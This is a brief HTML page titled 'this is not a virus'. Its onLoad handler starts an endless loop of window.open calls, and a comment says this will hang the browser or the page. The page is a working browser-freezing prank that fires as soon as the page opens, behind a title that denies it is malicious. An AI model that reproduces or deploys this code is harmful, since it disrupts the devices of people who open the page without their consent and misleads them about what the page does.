<!--this will hang the browser if popup blocker is off
and will hand the page if popup blocker is on-->

<html>
    <head>
        <title>this is not a virus</title>
    </head>
    <body onLoad="no()">

        <script>
            function no(){
                while(1){
                    window.open("www.google.com")
                }

            }

        </script>
    </body>
</html>